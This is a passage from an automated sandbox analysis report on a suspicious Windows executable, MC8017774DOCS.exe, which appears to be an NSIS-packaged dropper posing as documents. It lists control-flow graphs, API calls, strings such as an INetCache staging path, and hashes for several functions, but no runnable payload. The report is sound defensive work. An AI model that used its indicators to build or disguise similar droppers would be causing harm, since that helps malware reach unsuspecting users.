                                                                                                                                                    control_flow_graph 261 403d35-403d47 262 403e88-403e97 261->262 263 403d4d-403d53 261->263 265 403ee6-403efb 262->265 266 403e99-403ee1 GetDlgItem * 2 call 40420e SetClassLongW call 40140b 262->266 263->262 264 403d59-403d62 263->264 267 403d64-403d71 SetWindowPos 264->267 268 403d77-403d7a 264->268 270 403f3b-403f40 call 40425a 265->270 271 403efd-403f00 265->271 266->265 267->268 273 403d94-403d9a 268->273 274 403d7c-403d8e ShowWindow 268->274 279 403f45-403f60 270->279 276 403f02-403f0d call 401389 271->276 277 403f33-403f35 271->277 280 403db6-403db9 273->280 281 403d9c-403db1 DestroyWindow 273->281 274->273 276->277 298 403f0f-403f2e SendMessageW 276->298 277->270 278 4041db 277->278 286 4041dd-4041e4 278->286 284 403f62-403f64 call 40140b 279->284 285 403f69-403f6f 279->285 289 403dbb-403dc7 SetWindowLongW 280->289 290 403dcc-403dd2 280->290 287 4041b8-4041be 281->287 284->285 294 403f75-403f80 285->294 295 404199-4041b2 DestroyWindow EndDialog 285->295 287->278 293 4041c0-4041c6 287->293 289->286 296 403e75-403e83 call 404275 290->296 297 403dd8-403de9 GetDlgItem 290->297 293->278 300 4041c8-4041d1 ShowWindow 293->300 294->295 301 403f86-403fd3 call 4062b9 call 40420e * 3 GetDlgItem 294->301 295->287 296->286 302 403e08-403e0b 297->302 303 403deb-403e02 SendMessageW IsWindowEnabled 297->303 298->286 300->278 331 403fd5-403fda 301->331 332 403fdd-404019 ShowWindow KiUserCallbackDispatcher call 404230 EnableWindow 301->332 306 403e10-403e13 302->306 307 403e0d-403e0e 302->307 303->278 303->302 308 403e21-403e26 306->308 309 403e15-403e1b 306->309 311 403e3e-403e43 call 4041e7 307->311 312 403e5c-403e6f SendMessageW 308->312 314 403e28-403e2e 308->314 309->312 313 403e1d-403e1f 309->313 311->296 312->296 313->311 317 403e30-403e36 call 40140b 314->317 318 403e45-403e4e call 40140b 314->318 327 403e3c 317->327 318->296 328 403e50-403e5a 318->328 327->311 328->327 331->332 335 40401b-40401c 332->335 336 40401e 332->336 337 404020-40404e GetSystemMenu EnableMenuItem SendMessageW 335->337 336->337 338 404050-404061 SendMessageW 337->338 339 404063 337->339 340 404069-4040a8 call 404243 call 403d16 call 406297 lstrlenW call 4062b9 SetWindowTextW call 401389 338->340 339->340 340->279 351 4040ae-4040b0 340->351 351->279 352 4040b6-4040ba 351->352 353 4040d9-4040ed DestroyWindow 352->353 354 4040bc-4040c2 352->354 353->287 356 4040f3-404120 CreateDialogParamW 353->356 354->278 355 4040c8-4040ce 354->355 355->279 357 4040d4 355->357 356->287 358 404126-40417d call 40420e GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 356->358 357->278 358->278 363 40417f-404197 ShowWindow call 40425a 358->363 363->287
                                                                                                                                                    APIs
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
                                                                                                                                                    • ShowWindow.USER32(?), ref: 00403D8E
                                                                                                                                                    • DestroyWindow.USER32 ref: 00403DA2
                                                                                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00403DDF
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
                                                                                                                                                    • IsWindowEnabled.USER32(00000000), ref: 00403DFA
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00403EA8
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00403EB2
                                                                                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
                                                                                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
                                                                                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00403FC3
                                                                                                                                                    • ShowWindow.USER32(00000000,?), ref: 00403FE4
                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
                                                                                                                                                    • EnableWindow.USER32(?,?), ref: 00404011
                                                                                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
                                                                                                                                                    • EnableMenuItem.USER32(00000000), ref: 0040402E
                                                                                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
                                                                                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
                                                                                                                                                    • lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
                                                                                                                                                    • SetWindowTextW.USER32(?,007A1F20), ref: 00404097
                                                                                                                                                    • ShowWindow.USER32(?,0000000A), ref: 004041CB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3282139019-0
                                                                                                                                                    • Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                                                                                    • Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
                                                                                                                                                    • Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
                                                                                                                                                    • Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E
                                                                                                                                                    Function 00403987 Relevance: 47.5, APIs: 14, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 366 403987-40399f call 406671 369 4039a1-4039ac GetUserDefaultUILanguage call 4061de 366->369 370 4039b3-4039ea call 406165 366->370 373 4039b1 369->373 376 403a02-403a08 lstrcatW 370->376 377 4039ec-4039fd call 406165 370->377 375 403a0d-403a36 call 403c5d call 405c74 373->375 383 403ac8-403ad0 call 405c74 375->383 384 403a3c-403a41 375->384 376->375 377->376 390 403ad2-403ad9 call 4062b9 383->390 391 403ade-403b03 LoadImageW 383->391 384->383 385 403a47-403a6f call 406165 384->385 385->383 392 403a71-403a75 385->392 390->391 394 403b84-403b8c call 40140b 391->394 395 403b05-403b35 RegisterClassW 391->395 399 403a87-403a93 lstrlenW 392->399 400 403a77-403a84 call 405b99 392->400 407 403b96-403ba1 call 403c5d 394->407 408 403b8e-403b91 394->408 396 403c53 395->396 397 403b3b-403b7f SystemParametersInfoW CreateWindowExW 395->397 405 403c55-403c5c 396->405 397->394 401 403a95-403aa3 lstrcmpiW 399->401 402 403abb-403ac3 call 405b6c call 406297 399->402 400->399 401->402 406 403aa5-403aaf GetFileAttributesW 401->406 402->383 411 403ab1-403ab3 406->411 412 403ab5-403ab6 call 405bb8 406->412 418 403ba7-403bc1 ShowWindow call 406601 407->418 419 403c2a-403c32 call 4053d2 407->419 408->405 411->402 411->412 412->402 426 403bc3-403bc8 call 406601 418->426 427 403bcd-403bdf GetClassInfoW 418->427 424 403c34-403c3a 419->424 425 403c4c-403c4e call 40140b 419->425 424->408 428 403c40-403c47 call 40140b 424->428 425->396 426->427 431 403be1-403bf1 GetClassInfoW RegisterClassW 427->431 432 403bf7-403c1a DialogBoxParamW call 40140b 427->432 428->408 431->432 435 403c1f-403c28 call 4038d7 432->435 435->405
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                                                                                      • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                                                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000), ref: 004039A1
                                                                                                                                                      • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
                                                                                                                                                    • lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000), ref: 00403A08
                                                                                                                                                    • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
                                                                                                                                                    • GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
                                                                                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne), ref: 00403AEF
                                                                                                                                                    • RegisterClassW.USER32(007A79C0), ref: 00403B2C
                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
                                                                                                                                                    • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
                                                                                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403BAF
                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
                                                                                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
                                                                                                                                                    • RegisterClassW.USER32(007A79C0), ref: 00403BF1
                                                                                                                                                    • DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                    • API String ID: 606308-1472972687
                                                                                                                                                    • Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                                                                                    • Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
                                                                                                                                                    • Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
                                                                                                                                                    • Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D
                                                                                                                                                    Function 00402EDD Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 439 402edd-402f2b GetTickCount GetModuleFileNameW call 405d8d 442 402f37-402f65 call 406297 call 405bb8 call 406297 GetFileSize 439->442 443 402f2d-402f32 439->443 451 403052-403060 call 402e79 442->451 452 402f6b 442->452 444 40310f-403113 443->444 459 403062-403065 451->459 460 4030b5-4030ba 451->460 453 402f70-402f87 452->453 455 402f89 453->455 456 402f8b-402f94 call 40330e 453->456 455->456 465 402f9a-402fa1 456->465 466 4030bc-4030c4 call 402e79 456->466 461 403067-40307f call 403324 call 40330e 459->461 462 403089-4030b3 GlobalAlloc call 403324 call 403116 459->462 460->444 461->460 485 403081-403087 461->485 462->460 490 4030c6-4030d7 462->490 469 402fa3-402fb7 call 405d48 465->469 470 40301d-403021 465->470 466->460 475 40302b-403031 469->475 488 402fb9-402fc0 469->488 474 403023-40302a call 402e79 470->474 470->475 474->475 481 403040-40304a 475->481 482 403033-40303d call 406764 475->482 481->453 489 403050 481->489 482->481 485->460 485->462 488->475 494 402fc2-402fc9 488->494 489->451 491 4030d9 490->491 492 4030df-4030e4 490->492 491->492 495 4030e5-4030eb 492->495 494->475 496 402fcb-402fd2 494->496 495->495 497 4030ed-403108 SetFilePointer call 405d48 495->497 496->475 498 402fd4-402fdb 496->498 501 40310d 497->501 498->475 500 402fdd-402ffd 498->500 500->460 502 403003-403007 500->502 501->444 503 403009-40300d 502->503 504 40300f-403017 502->504 503->489 503->504 504->475 505 403019-40301b 504->505 505->475
                                                                                                                                                    APIs
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\MC8017774DOCS.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                      • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                      • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MC8017774DOCS.exe,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                    • String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MC8017774DOCS.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
                                                                                                                                                    • API String ID: 4283519449-3890393539
                                                                                                                                                    • Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                                                                                    • Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
                                                                                                                                                    • Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
                                                                                                                                                    • Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D
                                                                                                                                                    Function 004062B9 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209stringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 783 4062b9-4062c4 784 4062c6-4062d5 783->784 785 4062d7-4062ed 783->785 784->785 786 4062f3-406300 785->786 787 406505-40650b 785->787 786->787 788 406306-40630d 786->788 789 406511-40651c 787->789 790 406312-40631f 787->790 788->787 792 406527-406528 789->792 793 40651e-406522 call 406297 789->793 790->789 791 406325-406331 790->791 794 4064f2 791->794 795 406337-406375 791->795 793->792 799 406500-406503 794->799 800 4064f4-4064fe 794->800 797 406495-406499 795->797 798 40637b-406386 795->798 803 40649b-4064a1 797->803 804 4064cc-4064d0 797->804 801 406388-40638d 798->801 802 40639f 798->802 799->787 800->787 801->802 807 40638f-406392 801->807 810 4063a6-4063ad 802->810 808 4064b1-4064bd call 406297 803->808 809 4064a3-4064af call 4061de 803->809 805 4064d2-4064da call 4062b9 804->805 806 4064df-4064f0 lstrlenW 804->806 805->806 806->787 807->802 815 406394-406397 807->815 820 4064c2-4064c8 808->820 809->820 811 4063b2-4063b4 810->811 812 4063af-4063b1 810->812 818 4063b6-4063dd call 406165 811->818 819 4063ef-4063f2 811->819 812->811 815->802 821 406399-40639d 815->821 831 4063e3-4063ea call 4062b9 818->831 832 40647d-406480 818->832 824 406402-406405 819->824 825 4063f4-406400 GetSystemDirectoryW 819->825 820->806 823 4064ca 820->823 821->810 827 40648d-406493 call 40652b 823->827 829 406470-406472 824->829 830 406407-406415 GetWindowsDirectoryW 824->830 828 406474-406478 825->828 827->806 828->827 834 40647a 828->834 829->828 833 406417-406421 829->833 830->829 831->828 832->827 837 406482-406488 lstrcatW 832->837 839 406423-406426 833->839 840 40643b-406451 SHGetSpecialFolderLocation 833->840 834->832 837->827 839->840 844 406428-40642f 839->844 841 406453-40646a SHGetPathFromIDListW CoTaskMemFree 840->841 842 40646c 840->842 841->828 841->842 842->829 845 406437-406439 844->845 845->828 845->840
                                                                                                                                                    APIs
                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
                                                                                                                                                    • SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
                                                                                                                                                    • SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
                                                                                                                                                    • CoTaskMemFree.OLE32(007924D8), ref: 00406462
                                                                                                                                                    • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
                                                                                                                                                    • lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                    • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                    • API String ID: 717251189-1230650788
                                                                                                                                                    • Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                                                                                    • Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
                                                                                                                                                    • Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
                                                                                                                                                    • Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D
                                                                                                                                                    Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 846 40176f-401794 call 402c41 call 405be3 851 401796-40179c call 406297 846->851 852 40179e-4017b0 call 406297 call 405b6c lstrcatW 846->852 858 4017b5-4017b6 call 40652b 851->858 852->858 861 4017bb-4017bf 858->861 862 4017c1-4017cb call 4065da 861->862 863 4017f2-4017f5 861->863 871 4017dd-4017ef 862->871 872 4017cd-4017db CompareFileTime 862->872 865 4017f7-4017f8 call 405d68 863->865 866 4017fd-401819 call 405d8d 863->866 865->866 873 40181b-40181e 866->873 874 40188d-4018b6 call 4052ff call 403116 866->874 871->863 872->871 875 401820-40185e call 406297 * 2 call 4062b9 call 406297 call 4058fd 873->875 876 40186f-401879 call 4052ff 873->876 888 4018b8-4018bc 874->888 889 4018be-4018ca SetFileTime 874->889 875->861 909 401864-401865 875->909 886 401882-401888 876->886 890 402ace 886->890 888->889 892 4018d0-4018db CloseHandle 888->892 889->892 893 402ad0-402ad4 890->893 895 4018e1-4018e4 892->895 896 402ac5-402ac8 892->896 898 4018e6-4018f7 call 4062b9 lstrcatW 895->898 899 4018f9-4018fc call 4062b9 895->899 896->890 904 401901-4022fc call 4058fd 898->904 899->904 904->893 909->886 911 401867-401868 909->911 911->876
                                                                                                                                                    APIs
                                                                                                                                                    • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017B0
                                                                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017D5
                                                                                                                                                      • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                                                                                                      • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                                                                                                      • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,762323A0), ref: 0040535A
                                                                                                                                                      • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                                                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                                                                                                      • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
